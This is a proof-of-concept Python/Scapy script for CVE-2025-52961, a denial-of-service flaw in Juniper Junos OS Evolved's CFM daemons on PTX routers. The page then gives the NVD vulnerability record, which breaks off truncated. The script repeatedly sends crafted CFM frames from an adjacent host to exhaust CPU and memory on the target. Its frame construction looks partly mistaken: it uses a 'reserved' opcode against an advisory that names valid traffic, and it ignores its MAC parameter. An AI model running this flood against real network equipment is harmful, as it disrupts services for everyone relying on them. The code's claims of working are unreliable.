CVE-2025-52961

# CVE-2025-52961 PoC - Juniper Junos OS Evolved CFM DoS # This PoC demonstrates the attack vector by sending specific valid CFM protocol frames # to trigger CPU spike in cfmd and memory leak in cfmman #!/usr/bin/env python3 """ CVE-2025-52961 PoC Vulnerability: Uncontrolled Resource Consumption in cfmd/cfmman Affected: Juniper Junos OS Evolved on PTX10001-36MR, PTX10002-36QDD, PTX10004, PTX10008, PTX10016 Attack: Send specific valid CFM frames from adjacent network to cause DoS """ from scapy.all import Ether, Dot1Q, LLC, SNAP, Raw, sendp, conf import time import argparse # CFM EtherType (IEEE 802.1ag / ITU-T Y.1731) CFM_ETHERTYPE = 0x8902 def craft_cfm_frame(target_mac="01:80:c2:00:00:30", level=3, opcode=0): """ Craft a specific CFM (Connectivity Fault Management) protocol frame. CFM uses multicast destination MAC 01:80:c2:00:00:30 (Level 3). The frame triggers resource consumption in cfmd/cfmman on vulnerable Junos OS Evolved. """ # Ethernet header with CFM multicast destination dst_mac = f"01:80:c2:00:00:3{level}" # CFM multicast MAC for given level # CFM PDU structure # MD Level (3 bits) | Version (5 bits) | Opcode (8 bits) | Flags (8 bits) | TLVs md_level_version = (level << 5) | 0 # Level 3, Version 0 # Build CFM payload cfm_payload = bytes([ md_level_version, # MD Level + Version opcode, # Opcode (0=Reserved/specific trigger) 0x00, # Flags 0x00, 0x19, # TLV offset 0x00, 0x00, 0x00, 0x01, # Sequence number 0x00, 0x01, # MD/MA ID format ]) # Construct the frame frame = Ether(dst=dst_mac, type=CFM_ETHERTYPE) / Raw(load=cfm_payload) return frame def exploit(interface, target_ip, duration=60, interval=0.01): """ Send crafted CFM frames to trigger CPU spike and memory leak. Args: interface: Network interface to send packets from (must be adjacent to target) target_ip: Target device IP (for reference/logging) duration: Attack duration in seconds interval: Interval between packets in seconds """ conf.verb = 0 print(f"[*] CVE-2025-52961 PoC - CFM Resource Consumption DoS") print(f"[*] Target: {target_ip}") print(f"[*] Interface: {interface}") print(f"[*] Duration: {duration}s") print(f"[*] Sending crafted CFM frames...") end_time = time.time() + duration pkt_count = 0 while time.time() < end_time: # Send CFM frame at different levels to trigger the vulnerability for level in range(0, 7): frame = craft_cfm_frame(level=level, opcode=0) sendp(frame, iface=interface, verbose=False) pkt_count += 1 time.sleep(interval) print(f"[*] Sent {pkt_count} CFM frames") print(f"[*] Attack complete. Target cfmd should show 100% CPU, cfmman memory should be leaking.") print(f"[*] Monitor with: show system processes node fpc<num> detail | match cfmman") if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-52961 PoC") parser.add_argument("-i", "--interface", required=True, help="Network interface") parser.add_argument("-t", "--target", required=True, help="Target device IP") parser.add_argument("-d", "--duration", type=int, default=60, help="Duration in seconds") args = parser.parse_args() exploit(args.interface, args.target, args.duration)

{"cve": {"id": "CVE-2025-52961", "sourceIdentifier": "[email protected]", "published": "2025-10-09T16:15:45.247", "lastModified": "2026-01-23T18:35:18.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Uncontrolled Resource Consumption vulnerability in the Connectivity Fault Management (CFM) daemon and the Connectivity Fault Management Manager (cfmman) of Juniper Networks Junos OS Evolved on PTX10001-36MR, PTX10002-36QDD, PTX10004, PTX10008, PTX10016 allows an unauthenticated, adjacent attacker to cause a Denial-of-Service (DoS).\n\nAn attacker on an adjacent device sending specific valid traffic can cause cfmd to spike the CPU to 100% and cfmman's memory to leak, eventually to cause the FPC crash and restart.\n\nContinued receipt and processes of these specific valid packets will sustain the Denial of Service (DoS) condition.\n\nAn indicator of compromise is to watch for an increase in cfmman memory rising over time by issuing the following command and evaluating the RSS number. If the RSS is growing into GBs then consider restarting the device to temporarily clear memory.\n \n  user@device> show system processes node fpc<num> detail | match cfmman\n\nExample: \n\n  show system processes node fpc0 detail | match cfmman \n  F S UID       PID       PPID PGID   SID   C PRI NI  ADDR SZ    WCHAN   RSS     PSR STIME TTY         TIME     CMD\n  4 S root      15204     1    15204  15204 0 80  0   - 90802     -      113652   4  Sep25 ?           00:15:28 /usr/bin/cfmman -p /var/pfe -o -c /usr/conf/cfmman-cfg-active.xml\nThis issue affects Junos OS Evolved on PTX10001-36MR, PTX10002-36QDD, PTX10004, PTX10008, PTX10016:\n\n * from 23.2R1-EVO before 23.2R2-S4-EVO, \n * from 23.4 before 23.4R2-S4-EVO, \n * from 24.2 before 24.2R2-EVO, \n * from 24.4 before 24.4R1-S2-EVO, 24.4R2-EVO.\n\n\nThis issue does not affect Junos OS Evolved on PTX10001-36MR, PTX10002-36QDD, PTX10004, PTX10008, PTX10016 before 23.2R1-EVO."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:C/RE:M/U:Green", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "GREEN"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.2:r1:*:*:*:*:*:*", "matchCriteriaId": "DDEC008A-3137-48D1-8ABC-6DB0EFC40E50"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.2:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "558D234D-BC50-415F-86D6-8E19D6C3ACE0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.2:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "33F4EEEE-77E9-4973-A770-99E7BA2F05F5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.2:r2:*:*:*:*:*:*", "matchCriteriaId": "A4BB6910-B994-45FD-8153-5EC00EE842E6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos_os_evolved:23.2:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "D657944B-2066-4F2C-BC92-EDF4DE1 ... (truncated)